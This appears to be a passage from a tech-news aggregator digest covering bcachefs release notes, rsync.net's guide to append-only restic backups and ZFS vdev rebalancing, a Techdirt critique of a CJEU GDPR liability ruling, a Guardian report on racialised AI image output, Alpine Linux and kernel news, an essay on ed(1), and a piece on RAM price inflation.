  All error ratelimiting now obeys the `no_ratelimit_errors` option.

  All recovery passes should now have progress indicators.

- New options:

  `mount_trusts_udev`: there have been reports of mounting by UUID failing due
  to known bugs in libblkid. Previously this was available as an environment
  variable, but it now may be specified as a mount option (where it should also
  be much easier to find). When specified, we only use udev for getting the list
  of the system's block devices; we do all the probing for filesystem members
ourselves.

  `writeback_timeout`: if set, this overrides the `vm.dirty_writeback*` sysctls
  for the given filesystem, and may be set persistently. Useful for setting a
lower writeback timeout for removable media.

- Other smaller user-visible improvements

  The `mi_btree_bitmap` field in the member info section of the superblock now
  has a recovery pass to clean it up and shrink it; it will be automatically
  scheduled when we notice that there is significantly more space on a device
  marked as containing metadata than we have metadata on that device.

  The member-info btree bitmap is used by btree node scan, for disaster recovery
  repair; shrinking the bitmap reduces the amount of the device that has to be
  scanned if we have to recover from btree nodes that have become unreadable or
  lost despite replication. You don't ever want to need it, but if you do need
  it it's there.

- Promotes are now ratelimited; this resolves an issue with spinning up far too
  many kworker threads for promotes that wouldn't happen due to the target being
  busy.

- An issue was spotted on a user filesystem where btree node merging wasn't
  happening properly on the `reconcile_work` btree, causing a very slow upgrade.
  Btree node merging has now seen some improvements; btree lookups can now kick
  off asynchronous btree node merges when they spot an empty btree node, and the
  btree write buffer now does btree merging asynchronously, which should be a
  noticeable improvement on system performance under heavy load for some users -
  btree write buffer flushing is single threaded and can be a bottleneck.

  There's also a new recovery pass, `merge_btree_nodes`, to check all btrees for
  nodes that can be merged. It's not run automatically, but can be run if
  desired by passing the `recovery_passes` option to an online fsck.

- And many other bug fixes.

### Notable under-the-hood codebase work:

A lot of codebase modernization has been happening over the past six months,
to prepare for Rust. With the latest features recently available in C and in
the kernel, we can now do incremental refactorings to bring code steadily more
in line with what the Rust version will be, so that the future conversion will
be mostly syntactic - and not a rewrite. The big enabler here was CLASS(),
which is the kernel's version of pseudo-RAII based on `__cleanup()`; this
allows for the removal of goto based error handling (Rust notably does not
have goto).

We're now down to ~600 gotos in the entire codebase, down from ~2500 when the
modernization started, with many files being complete.

Other work includes avoiding open coded vectors; bcachefs uses DARRAY(), which
is decently close to Rust/C++ vectors, and the try() macro for forwarding
errors, stolen from Rust. These cleanups have deleted thousands of lines from
the codebase over the past months.


rsync.net technical notes Q4

Lobsters
www.rsync.net
2025-12-04 19:58:39
Comments...
Original Article

Technical Notes - Q4 2025

Append-Only backups with rclone serve restic --stdio ... ZFS vdev rebalancing ... borg mount example
(Discussion Thread at HackerNews)

Append-Only Backups with rclone serve restic --stdio

rsync.net users may run unix commands, remotely, over SSH like this:

ssh user@rsync.net md5 some/file

or:

ssh user@rsync.net rm -rf some/file

There is a restricted set of commands that can be run, and because customer filesystems are mounted noexec,nosuid it is not possible to run commands that customers upload.

However, as an added defense, we also have an arguments firewall wherein we explicitly allow only specific arguments to be specified for each allowed command.

Since the inclusion of the 'rclone' command on our platform we have very intentionally disallowed the "serve" argument as we have no intention of allowing customers to run persistent processes or open sockets, answer other protocols, etc.

However ...

A number of customers, most notably Michael Alyn Miller, pointed out that the 'rclone serve restic' workflow has a --stdio modifier that causes the "serve" functions to happen over stdio without opening network sockets or spawning server processes, etc., and enables this very particular command to be run:

rclone serve restic --stdio

... which is interesting because this gives us an encrypted "append only" workflow using restic ... which is built into rclone ... which is built into our platform[1].

This is accomplished by creating a specific SSH key just for these append-only backups. This key is placed in the ~/.ssh/authorized_keys file inside your rsync.net account with a command restriction:

restrict,command="rclone serve restic --stdio --append-only path/path/repo" ssh-ed25519 JHWGSFDEaC1lZDIUUBVVSSDAIE1P3GjIRpxxFjjsww2nx3mcnwwebwLk ....

... which means that logins occurring with that SSH key may not run any command other than this very specific one, which not only specifies --append-only but also the exact repository to work on.

You will also need to create a second SSH key with no command restrictions - you'll see why as we continue below ...

On the client end (your end) you would perform an append-only backup like this:

First, initialize a restic repository in your rsync.net account using the normal SSH key that has no command restrictions :

restic -r sftp:user@rsync.net:path/repo init

enter password for new repository:
enter password again:
Enter passphrase for key '/home/user/.ssh/admin_key':
created restic repository 149666wedd at sftp:user@rsync.net:path/repo

Please note that knowledge of your password is required to access the repository. Losing your password means that your data is irrecoverably lost.

Second, perform a backup of /YOUR/SOURCE/DATA to this newly initialized repository:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA

enter password for repository:
repository 149666wedd opened successfully, password is correct
created new cache in path/repo/.cache/restic
no parent snapshot found, will read all files
Files:        2112 new,     0 changed,     0 unmodified
Dirs:          303 new,     0 changed,     0 unmodified
Added to the repo: 869.197 MiB

processed 2114 files, 1600.575 MiB in 1:01
snapshot dnn0629f saved

You now have your first snapshot. Let's add a file, change some files, delete a file, and then do another backup:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA

enter password for repository:
repository 149666wedd opened successfully, password is correct
using parent snapshot dnn0629f

Files:           1 new,     1 changed,  2110 unmodified
Dirs:            0 new,     3 changed,    82 unmodified
Added to the repo: 615.911 MiB

processed 2114 files, 1.160 GiB in 0:01
snapshot a39b6628 saved

We have created a repository, uploaded data to it, and refreshed it with new data.

Now let's verify that we can see the snapshots we've created:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo list snapshots

enter password for repository:
repository 149666wedd opened successfully, password is correct
ijnssb337c4423013b69ed833fc5514ca010160nbss223h95122fcb22h361tt7
snBSGw23hBBSj2k23d055723b2336caajsnnww23b3cc16cf88838f085bbww1kv

Finally, let's prove to ourselves that the repository is, indeed, append-only:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo forget --keep-last 1

repository 149666wedd opened successfully, password is correct
Applying Policy: keep 1 latest snapshots
keep 1 snapshots:
ID        Time                 Host        Tags        Reasons Paths
-----------------------------------------------------------------------------------------
a39b6628  2025-03-29 20:10:44  hostname                last snapshot /YOUR/SOURCE/DATA
-----------------------------------------------------------------------------------------
1 snapshots

remove 1 snapshots:
ID        Time                 Host        Tags        Paths
--------------------------------------------------------------------------
dnn0629f  2025-03-29 20:09:54  hostname                /YOUR/SOURCE/DATA
--------------------------------------------------------------------------
1 snapshots

Remove() returned error, retrying after 720.254544ms: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 873.42004ms: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 1.054928461s: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 1.560325776s: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 3.004145903s: blob not removed, server response: 403 Forbidden (403)
 signal interrupt received, cleaning up
unable to remove  from the repository
[0:04] 0.00%  0 / 1 files deleted

What we have accomplished is a remote, encrypted backup (using restic) that can only be accessed by one of two SSH keys - a "normal" SSH key that has full control over the rsync.net account and can read/write/delete arbitrarily and a second "append-only" SSH key that cannot do anything at all except call rclone, specifically to run restic, and even more specifically in append-only mode .

This arrangement only makes sense if you keep the "normal" SSH key out of, and away from, whatever system is running these automated backups. The system that runs the backups should only have the append-only key. This way, if an attacker gains control of the source system they cannot abuse the backup configuration to destroy your remote backups at rsync.net.

[1] The restic binary is not installed on our platform and the correct way for rsync.net users to use "plain old restic" is to run it over SFTP with their rsync.net account as the SFTP endpoint.

ZFS vdev rebalancing

Let's pretend that you have a zpool with four vdevs, each of which are 90% full.

If you add a fifth vdev to this zpool, ZFS will tend to balance all new writes across all five vdevs which is a strategy that maximizes performance.

Unfortunately, if you continue to write data to this pool, the first four vdevs will eventually reach 95-96% full while the new, fifth vdev is only 5-6% full, and ZFS will switch allocation strategies to "best fit", directing most (almost all) writes to only the new vdev.

Which is to say: your 5-vdev pool will have increased performance due to the addition of the 5th vdev for only a very short time. After that, performance will degrade markedly as you write to only the new vdev. The original four vdevs are effectively full.

One way to manage this scenario is to set a write threshold with this sysctl:

vfs.zfs.mg.noalloc_threshold

... and copy data from this zpool to itself .

For instance:

Wait for a period of light (or no) activity when you know you will be the only one writing any significant data to the pool.

Set the 'vfs.zfs.mg.noalloc_threshold' sysctl to just below the current free-space percentage of your existing vdevs ... in this case the existing vdevs are 90% full (10% free), and since we are willing to let them grow by about 2% each, we will set the sysctl to '8':

# sysctl -w vfs.zfs.mg.noalloc_threshold=8

... which means that at 8% free (92% full) these vdevs will stop accepting new writes.

Now find 10 TB of data on this zpool to copy (not move) back to itself.

(or, alternatively, find a 10TB dataset to 'zfs send' back to itself)

When this 10 TB of data is written to the pool it will be distributed evenly across all five vdevs.

Further, when you delete the source data (or dataset) you will be removing 2.5 TB of data from each of the original four vdevs, which was replaced with only 2 TB of newly written data on each.

All future reads and writes of this data will now occur from five vdevs rather than four, thus increasing performance. You are, effectively, defragmenting the pool.

In this hypothetical situation our four original vdevs are now 89.5% full, which means you could leave the sysctl set at '8' but this time choose a 12.5 TB dataset or collection of files and copy/send that back to itself. (12.5 TB spread across five vdevs lands 2.5 TB on each, which fits within the headroom the original vdevs now have below the 92% cutoff.)

The condition we are trying to avoid is one where our rebalancing of data, along with other variables or activity on the system, causes one of the existing vdevs to fill up to 95-96%, at which point it will effectively stop accepting new writes.

By locking the fullness threshold with this sysctl, we can make sure we are rebalancing onto all five vdevs evenly and not overloading any one of them.

If you repeat the above procedure a few times you will achieve a manually rebalanced - and defragmented - zpool. New data will tend to write across all five vdevs and all of the data that you manually rebalanced will be newly spread across all five vdevs.
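Putting the steps together, one rebalancing pass might look like the following sketch, assuming a hypothetical pool named 'tank', a roughly 10 TB dataset named 'tank/bulk', and the FreeBSD default of '0' for the sysctl:

# stop the old vdevs from accepting new writes at 92% full
sysctl -w vfs.zfs.mg.noalloc_threshold=8

# rewrite the dataset so its blocks spread across all five vdevs
zfs snapshot tank/bulk@rebalance
zfs send tank/bulk@rebalance | zfs recv tank/bulk.new

# free the old, unbalanced copy and put the new one in its place
zfs destroy -r tank/bulk
zfs rename tank/bulk.new tank/bulk
zfs destroy tank/bulk@rebalance

# restore the default threshold when finished
sysctl -w vfs.zfs.mg.noalloc_threshold=0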

borg mount syntax

You can remotely mount a borg repo stored in your rsync.net account to a local mountpoint:

borg mount --remote-path=borg14 user@rsync.net:path/path/repo/ /mnt/borg

This will mount the remote borg repository, locally, in /mnt/borg. It will be mounted as a borgfs device of type "fuse".

This borg mount is read-only by default.

This HOWTO has some interesting workflows for 'borg mount', such as mounting multiple repositories with a 'for' loop and 'diff'ing between mounted repositories.
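For instance, a sketch of that multi-repository workflow (the repository and archive names are hypothetical):

for repo in repo1 repo2; do
    mkdir -p /mnt/borg/$repo
    borg mount --remote-path=borg14 user@rsync.net:path/$repo /mnt/borg/$repo
done

# compare the same file across two mounted archives:
diff /mnt/borg/repo1/monday/etc/fstab /mnt/borg/repo2/monday/etc/fstab

# unmount when finished:
for repo in repo1 repo2; do borg umount /mnt/borg/$repo; done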

More Information

rsync.net publishes a wide array of support documents as well as a FAQ

rsync.net has been tested, reviewed and discussed in a variety of venues.

You, or your CEO, may find our CEO Page useful.

Please see our HIPAA, GDPR, and Sarbanes-Oxley compliance statements.

Contact info@rsync.net for more information, and answers to your questions.

Click here for Simple Pricing, or call 619-819-9156 or email info@rsync.net for more information.

CJEU has made it effectively impossible to run a user-generated platform legally

Hacker News
www.techdirt.com
2025-12-04 19:55:04
Comments...
Original Article

from the seems-like-a-problem dept

The Court of Justice of the EU—likely without realizing it—just completely shit the bed and made it effectively impossible to run any website in the entirety of the EU that hosts user-generated content.

Obviously, for decades now, we’ve been talking about issues related to intermediary liability, and what standards are appropriate there. I am an unabashed supporter of the US’s approach with Section 230, as it was initially interpreted, which said that any liability should land on the party who contributed the actual violative behavior—in nearly all cases the speaker, not the host of the content.

The EU has always held itself to a lower standard of intermediary liability, first with the E-Commerce Directive and more recently with the Digital Services Act (DSA), which still generally tries to put more liability on the speaker but has some ways of shifting the liability to the platform.

No matter which of those approaches you think is preferable, I don’t think anyone could (or should) favor what the Court of Justice of the EU came down with earlier this week, which is basically “fuck all this shit, if there’s any content at all on your site that includes personal data of someone you may be liable.”

As with so many legal clusterfucks, this one stems from a case with bad facts, which then leads to bad law. You can read the summary as the CJEU puts it:

The applicant in the main proceedings claims that, on 1 August 2018, an unidentified third party published on that website an untrue and harmful advertisement presenting her as offering sexual services. That advertisement contained photographs of that applicant, which had been used without her consent, along with her telephone number. The advertisement was subsequently reproduced identically on other websites containing advertising content, where it was posted online with the indication of the original source. When contacted by the applicant in the main proceedings, Russmedia Digital removed the advertisement from its website less than one hour after receiving that request. The same advertisement nevertheless remains available on other websites which have reproduced it.

And, yes, no one is denying that this absolutely sucks for the victim in this case. But if there’s any legal recourse, it seems like it should be on whoever created and posted that fake ad. Instead, the CJEU finds that Russmedia is liable for it, even though they responded within an hour and took down the ad as soon as they found out about it.

The lower courts went back and forth on this, with a Romanian tribunal (on first appeal) finding, properly, that there’s no fucking way Russmedia should be held liable, seeing as it was merely hosting the ad and had nothing to do with its creation:

The Tribunalul Specializat Cluj (Specialised Court, Cluj, Romania) upheld that appeal, holding that the action brought by the applicant in the main proceedings was unfounded, since the advertisement at issue in the main proceedings did not originate from Russmedia, which merely provided a hosting service for that advertisement, without being actively involved in its content. Accordingly, the exemption from liability provided for in Article 14(1)(b) of Law No 365/2002 would be applicable to it. As regards the processing of personal data, that court held that an information society services provider was not required to check the information which it transmits or actively to seek data relating to apparently unlawful activities or information. In that regard, it held that Russmedia could not be criticised for failing to take measures to prevent the online distribution of the defamatory advertisement at issue in the main proceedings, given that it had rapidly removed that advertisement at the request of the applicant in the main proceedings.

With the case sent up to the CJEU, things get totally twisted, as they argue that under the GDPR, the inclusion of “sensitive personal data” in the ad suddenly makes the host a “joint controller” of the data under that law. As a controller of data, the much stricter GDPR rules on data protection now apply, and the more careful calibration of intermediary liability rules get tossed right out the window.

And out the window, right with it, is the ability to have a functioning open internet.

The court basically shreds basic intermediary liability principles here:

In any event, the operator of an online marketplace cannot avoid its liability, as controller of personal data, on the ground that it has not itself determined the content of the advertisement at issue published on that marketplace. Indeed, to exclude such an operator from the definition of ‘controller’ on that ground alone would be contrary not only to the clear wording, but also the objective, of Article 4(7) of the GDPR, which is to ensure effective and complete protection of data subjects by means of a broad definition of the concept of ‘controller’.

Under this ruling, it appears that any website that hosts any user-generated content can be strictly liable if any of that content contains “sensitive personal data” about any person. But how the fuck are they supposed to handle that?

The basic answer is to pre-scan any user-generated content for anything that might later be deemed to be sensitive personal data and make sure it doesn’t get posted.

How would a platform do that?

¯\_(ツ)_/¯

There is no way that this is even remotely possible for any platform, no matter how large or how small. And it’s even worse than that. As intermediary liability expert Daphne Keller explains:

The Court said the host has to

  • pre-check posts (i.e. do general monitoring)
  • know who the posting user is (i.e. no anonymous speech)
  • try to make sure the posts don’t get copied by third parties (um, like web search engines??)

Basically, all three of those are effectively impossible.

Think about what the court is actually demanding here. Pre-checking posts means full-scale automated surveillance of every piece of content before it goes live—not just scanning for known CSAM hashes or obvious spam, but making subjective legal determinations about what constitutes “sensitive personal data” under the GDPR. Requiring user identification kills anonymity entirely, which is its own massive speech issue. And somehow preventing third parties from copying content? That’s not even a technical problem—it’s a “how do you stop the internet from working like the internet” problem.

Some people have said that this ruling isn’t so bad, because the ruling is about advertisements and because it’s talking about “sensitive personal data.” But it’s difficult to see how either of those things limit this ruling at all.

There’s nothing in the law or the ruling that inherently limits its conclusions to “advertisements.” The same underlying factors would apply to any third party content on any website that is subject to the GDPR.

As for the “sensitive personal data” part, that makes little difference because sites will have to scan all content before anything is posted to guarantee no “sensitive personal data” is included and then accurately determine what a court might later deem to be such sensitive personal data. That means it’s highly likely that any website that tries to comply under this ruling will block a ton of content on the off chance that maybe that content will be deemed sensitive.

As the court noted:

In accordance with Article 5(1)(a) of the GDPR, personal data are to be processed lawfully, fairly and in a transparent manner in relation to the data subject. Article 5(1)(d) of the GDPR adds that personal data processed must be accurate and, where necessary, kept up to date. Thus, every reasonable step must be taken to ensure that personal data that are inaccurate, having regard to the purposes for which they are processed, are erased or rectified without delay. Article 5(1)(f) of that regulation provides that personal data must be processed in a manner that ensures appropriate security of those data, including protection against unauthorised or unlawful processing.

Good luck figuring out how to do that with third-party content.

And they’re pretty clear that every website must pre-scan every bit of content. They claim it’s about “marketplaces” and “advertisements” but there’s nothing in the GDPR that limits this ruling to those categories:

Accordingly, inasmuch as the operator of an online marketplace, such as the marketplace at issue in the main proceedings, knows or ought to know that, generally, advertisements containing sensitive data in terms of Article 9(1) of the GDPR, are liable to be published by user advertisers on its online marketplace, that operator, as controller in respect of that processing, is obliged, as soon as its service is designed, to implement appropriate technical and organisational measures in order to identify such advertisements before their publication and thus to be in a position to verify whether the sensitive data that they contain are published in compliance with the principles set out in Chapter II of that regulation. Indeed, as is apparent in particular from Article 25(1) of that regulation, the obligation to implement such measures is incumbent on it not only at the time of the processing, but already at the time of the determination of the means of processing and, therefore, even before sensitive data are published on its online marketplace in breach of those principles, that obligation being specifically intended to prevent such breaches.

No more anonymity allowed:

As regards, in the second place, the question whether the operator of an online marketplace, as controller of the sensitive data contained in advertisements published on its website, jointly with the user advertiser, must verify the identity of that user advertiser before the publication, it should be recalled that it follows from a combined reading of Article 9(1) and Article 9(2)(a) of the GDPR that the publication of such data is prohibited, unless the data subject has given his or her explicit consent to the data in question being published on that online marketplace or one of the other exceptions laid down in Article 9(2)(b) to (j) is satisfied, which does not, however, appear to be the case here.

On that basis, while the placing by a data subject of an advertisement containing his or her sensitive data on an online marketplace may constitute explicit consent, within the meaning of Article 9(2)(a) of the GDPR, such consent is lacking where that advertisement is placed by a third party, unless that party can demonstrate that the data subject has given his or her explicit consent to the publication of that advertisement on the online marketplace in question. Consequently, in order to be able to ensure, and to be able to demonstrate, that the requirements laid down in Article 9(2)(a) of the GDPR are complied with, the operator of the marketplace is required to verify, prior to the publication of such an advertisement, whether the user advertiser preparing to place the advertisement is the person whose sensitive data appear in that advertisement, which presupposes that the identity of that user advertiser is collected.

Finally, as Keller noted above, the CJEU seems to think it’s possible to require platforms to make sure content is never displayed on any other platform as well:

Thus, where sensitive data are published online, the controller is required, under Article 32 of the GDPR, to take all technical and organisational measures to ensure a level of security apt to effectively prevent the occurrence of a loss of control over those data.

To that end, the data controller must consider in particular all technical measures available in the current state of technical knowledge that are apt to block the copying and reproduction of online content.

Again, the CJEU appears to be living in a fantasy land that doesn’t exist.

This is what happens when you over-index on the idea of “data controllers” needing to keep data “private.” Whoever revealed sensitive data should have the liability placed on them. Putting it on the intermediary is misplaced and ridiculous.

There is simply no way to comply with the law under this ruling.

In such a world, the only options are to ignore it, shut down EU operations, or geoblock the EU entirely. I assume most platforms will simply ignore it—and hope that enforcement will be selective enough that they won’t face the full force of this ruling. But that’s a hell of a way to run the internet, where companies just cross their fingers and hope they don’t get picked for an enforcement action that could destroy them.

There’s a reason why the basic simplicity of Section 230 makes sense. It says “the person who creates the content that violates the law is responsible for it.” As soon as you open things up to say the companies that provide the tools for those who create the content can be liable, you’re opening up a can of worms that will create a huge mess in the long run.

That long run has arrived in the EU, and with it, quite the mess.


Google’s AI Nano Banana Pro accused of generating racialised ‘white saviour’ visuals

Guardian
www.theguardian.com
2025-12-04 19:35:30
Research finds tool depicts white women surrounded by black children when prompted about humanitarian aid in Africa Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – ...
Original Article

Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – and sometimes appends the logos of large charities.

Asking the tool tens of times to generate an image for the prompt “volunteer helps children in Africa” yielded, with two exceptions, a picture of a white woman surrounded by Black children, often with grass-roofed huts in the background.

In several of these images, the woman wore a T-shirt emblazoned with the phrase “Worldwide Vision”, and with the UK charity World Vision’s logo. In another, a woman wearing a Peace Corps T-shirt squatted on the ground, reading The Lion King to a group of children.

AI-generated image using the tool with the prompt ‘volunteer helps children in Africa’. Illustration: Google

The prompt “heroic volunteer saves African children” yielded multiple images of a man wearing a vest with the logo of the Red Cross.

Arsenii Alenichev, a researcher at the Institute of Tropical Medicine in Antwerp studying the production of global health images, said he noticed these images, and the logos, when experimenting with Nano Banana Pro earlier this month.

“The first thing that I noticed was the old suspects: the white saviour bias, the linkage of dark skin tone with poverty and everything. Then something that really struck me was the logos, because I did not prompt for logos in those images and they appear.”

Examples he shared with the Guardian showed women wearing “Save the Children” and “Doctors Without Borders” T-shirts, surrounded by Black children, with tin-roofed huts in the background. These were also generated in response to the prompt “volunteer helps children in Africa”.

In response to a query from the Guardian, a World Vision spokesperson said: “We haven’t been contacted by Google or Nano Banana Pro, nor have we given permission to use or manipulate our own logo or misrepresent our work in this way.”

Kate Hewitt, the director of brand and creative at Save the Children UK, said: “These AI-generated images do not represent how we work.”

An image generated with the prompt ‘volunteer helps children in Africa’. Illustration: Google

She added: “We have serious concerns about third parties using Save the Children’s intellectual property for AI content generation, which we do not consider legitimate or lawful. We’re looking into this further along with what action we can take to address it.”

AI image generators have been shown repeatedly to replicate – and at times exaggerate – US social biases. Models such as Stable Diffusion and OpenAI’s Dall-E offer mostly images of white men when asked to depict “lawyers” or “CEOs”, and mostly images of men of colour when asked to depict “a man sitting in a prison cell”.

Recently, AI-generated images of extreme, racialised poverty have flooded stock photo sites, leading to discussion in the NGO community about how AI tools replicate harmful images and stereotypes, bringing in an era of “poverty porn 2.0”.

It is unclear why Nano Banana Pro adds the logos of real charities to images of volunteers and scenes depicting humanitarian aid.

In response to a query from the Guardian, a Google spokesperson said: “At times, some prompts can challenge the tools’ guardrails and we remain committed to continually enhancing and refining the safeguards we have in place.”


Alpine Linux 3.23.0 released

Linux Weekly News
lwn.net
2025-12-04 19:26:35
Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk), and replacing the linux-edge package with linux-stable: For years, linux-lts and linux-edge grew apart and developed their own kernel configs...
Original Article

Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk), and replacing the linux-edge package with linux-stable:

For years, linux-lts and linux-edge grew apart and developed their own kernel configs, different architectures, etc.

Now linux-edge gets replaced with linux-stable which has the identical configuration as linux-lts, but follows the stable releases instead of the long-term releases (see https://kernel.org/).

The /usr merge planned for this release has been postponed; a new timeline for the change will be published later. See the release notes for more information on this release.



[$] The beginning of the 6.19 merge window

Linux Weekly News
lwn.net
2025-12-04 19:22:54
As of this writing, 4,124 non-merge commits have been pulled into the mainline repository for the 6.19 kernel development cycle. That is a relatively small fraction of what can be expected this time around, but it contains quite a bit of significant work, with changes to many core kernel subsystems...

Why ed(1)?

Lobsters
blog.thechases.com
2025-12-04 19:18:10
Comments...
Original Article

As the weirdo behind the somewhat tongue-in-cheek @ed1conf account on Twitter and Mastodon, I'm occasionally asked "Why ed(1)?" Hopefully some of my reasons for learning & using ed(1) can pique your interest in taking the time to get to know this little piece of history.

Ubiquity

Sometimes your favorite $EDITOR is installed, sometimes it's not. Some, like vi/vim, are just about everywhere. Other times, you'd need sufficient privileges/space to install or compile your editor of choice. But if you know ed, nearly every Linux/BSD/Mac has it installed because it's part of the POSIX standard. It's even small enough to fit on most recovery media without breaking the bank. Between ed and vi/vim, I know that I can get things done even when I'm on a new machine.

Sometimes it's the only editor you have

Several times in my life ed has been the only editor available in certain environments.

  • At $DAYJOB[-1] the Linux-based router needed some configuration changes that the web interface didn't accommodate. So a quick terminal connection later (telnet, sigh), I discovered that ed was the only editor available. No problem. Edited the config file and we were back up and running with the proper changes.
  • At the same $DAYJOB[-1], I developed software for a ruggedized hand-held device and its attached printer. This was back when PDAs were just becoming popular, so this thing was a brick. The DOS-based operating system had no built-in editor, meaning editing files usually meant laboriously copying the file over a serial link to the PC, editing it there, then sending it back down. I longed for the ability to cut that time down but very few of the full-screen editors I tried were even able to successfully paint on the small LCD screen-buffer properly, and of those that did, the on-screen keyboard took up so much screen real-estate as to make them useless. So I installed a DOS build of ed and it worked like a charm (better than edlin.exe, which I also tried). Editing turn-around and testing went from 15-20 minutes down to 3-5 minutes per iteration.
  • Some platforms such as Heroku provide only ed as their editor. Not usually an issue since most of the time you're not trying to edit live on the server. But if you need to do it, it's nice to know how.
  • On some MUD games and old BBSes, the text editor is often an ed-like editor.

Visible editing history

Unless you have a key-echoing utility like Screenkey or Screenflick, it's hard for an audience to see exactly what you did when you're editing during a presentation. It's nice for the audience to be able to see exactly what you typed if they're trying to follow along.

All commands are ASCII text

Sometimes your terminal emulator or keyboard isn't configured correctly. Function keys, arrows, alt- and meta- modifiers may not transmit properly. Since all of ed's commands are basic ASCII, it works even if your keyboard/terminal is unable to send extended characters properly.

It works when $TERM is messed up

Likewise, your $TERM setting can get messed up. Sometimes full-screen terminal applications leave the screen in a state where everything is somewhat garbled. Yes, there's reset which will let you reset the terminal back to some sensible defaults, but sometimes your termcap database has trouble too. An editor that only uses stdin and stdout can save your bacon.

Accessibility

Because ed reads all of its commands from stdin and writes all output to stdout in a serial fashion, it's very usable with a screen-reader like yasr or speakup, allowing you to edit text without a screen. If you've never edited text sightless, give it a try some time.

Scriptability

Because ed reads all of its commands from stdin it's easy to write a script that will edit a file in an automated fashion.
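For example, here is a minimal sketch that fixes a common typo in place, assuming a file named notes.txt (the -s flag suppresses ed's byte-count chatter):

printf '%s\n' 'g/teh/s//the/g' 'w' 'q' | ed -s notes.txt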

Previous output

On occasion, I want to see the output of one or more previous shell commands while I continue to edit. A full-screen editor takes over the entire screen, preventing me from seeing that output. With ed the previous output is right there and remains in my scroll-back buffer for reference while I edit. I find this particularly useful when using \e in psql or mysql if my $EDITOR is set to ed. This allows me to edit the SQL while keeping the results of my previous query visible.
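A sketch of that workflow (the database and table names are hypothetical):

$ EDITOR=ed psql mydb
mydb=> SELECT count(*) FROM users;
mydb=> \e
(the query buffer opens in ed while the previous results remain visible above)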

Small, fast, light

On resource-constrained systems, sometimes you need something light like ed where the executable and memory-footprint are measured in kilobytes rather than megabytes. This is less of a problem on most systems these days, but with small resource-constrained SOC and embedded boards running Linux or BSD, a light-weight yet powerful editor can help.

Usable on low-bandwidth/high-latency connections

Sometimes you are connected by a slow or very laggy connection. Whether this is a satellite uplink, a 300-baud serial connection, or a congested WAN link, sometimes you simply want to edit productively without the overhead of repainting the screen.

Showing off

Finally, there's a small measure of grey-beard prestige that comes with using an editor that baffles so many people. It's a fast way to demonstrate that I'm not some newbie with cert-only knowledge, but that I enjoy Unix history and working at the command-line. Or maybe it shows that I'm just a little crazy.

The RAM shortage comes for us all

Hacker News
www.jeffgeerling.com
2025-12-04 19:16:11
Comments...
Original Article

Memory price inflation comes for us all, and if you're not affected yet, just wait.

I was building a new PC last month using some parts I had bought earlier this year. The 64 Gigabyte T-Create DDR5 memory kit I used cost $209 then. Today? The same kit costs $650!

Just in the past week, we found out Raspberry Pi is increasing their single board computer prices. Micron's killing the Crucial brand of RAM and storage devices completely, meaning there's gonna be one fewer consumer memory manufacturer. Samsung can't even buy RAM from themselves to build their own smartphones, and small vendors like Libre Computer and Mono are seeing RAM prices double, triple, or even worse, and they're not even buying the latest RAM tech!

PC Parts Picker RAM Graph

I think PC builders might be the first crowd to get impacted across the board—just look at these insane graphs from PC Parts Picker , showing RAM prices going from like $30 to $120 for DDR4, or like $150 to five hundred dollars for 64 gigs of DDR5.

But the impacts are only just starting to hit other markets.

Libre Computer mentioned on Twitter a single 4 gigabyte module of LPDDR4 memory costs $35. That's more expensive than every other component on one of their single board computers combined! You can't survive selling products at a loss, so once the current production batches are sold through, either prices will be increased, or certain product lines will go out of stock.

The smaller the company, the worse the price hit will be. Even Raspberry Pi, who I'm sure has a little more margin built in, already raised SBC prices (and introduced a 1 GB Pi 5—maybe a good excuse for developers to drop Javascript frameworks and program for lower memory requirements again?).

Cameras, gaming consoles, tablets, almost anything that has memory will get hit sooner or later.

I can't believe I'm saying this, but compared to the current market, Apple's insane memory upgrade pricing is... actually in line with the rest of the industry.

The reason for all this, of course, is AI datacenter buildouts. I have no clue if there's any price fixing going on like there was a few decades ago—that's something conspiracy theorists can debate—but the problem is there's only a few companies producing all the world's memory supplies.

And those companies all realized they can make billions more dollars making RAM just for AI datacenter products, and neglect the rest of the market.

So they're shutting down their consumer memory lines, and devoting all production to AI.

Even companies like GPU board manufacturers are getting shafted; Nvidia's not giving memory to them along with their chips like they used to, basically telling them "good luck, you're on your own for VRAM now!"

Which is especially rich, because Nvidia's profiting obscenely off of all this stuff.

That's all bad enough, but some people see a silver lining. I've seen some people say "well, once the AI bubble bursts, at least we'll have a ton of cheap hardware flooding the market!"

And yes, in past decades, that might be one outcome.

But the problem here is the RAM they're making: a ton of it is either integrated into specialized GPUs that won't run on normal computers, or being fitted into special types of memory modules that don't work on consumer PCs, either. (See: HBM.)

That, and the GPUs and servers being deployed now don't even run on normal power and cooling, they're part of massive systems that would take a ton of effort to get running in even the most well-equipped homelabs. It's not like the classic Dell R720 that just needs some air and a wall outlet to run.

That is to say, we might be hitting a weird era where the PC building hobby is gutted, SBCs get prohibitively expensive, and anyone who didn't stockpile parts earlier this year is, pretty much, in a lurch.

Even Lenovo admits to stockpiling RAM, making this like the toilet paper situation back in 2020, except for massive corporations. Not enough supply, so companies who can afford to get some will buy it all up, hoping to stave off the shortages that will probably last longer, partly because of that stockpiling.

I don't think it's completely outlandish to think some companies will start scavenging memory chips (à la dosdude1) off other systems for stock, especially if RAM prices keep going up.

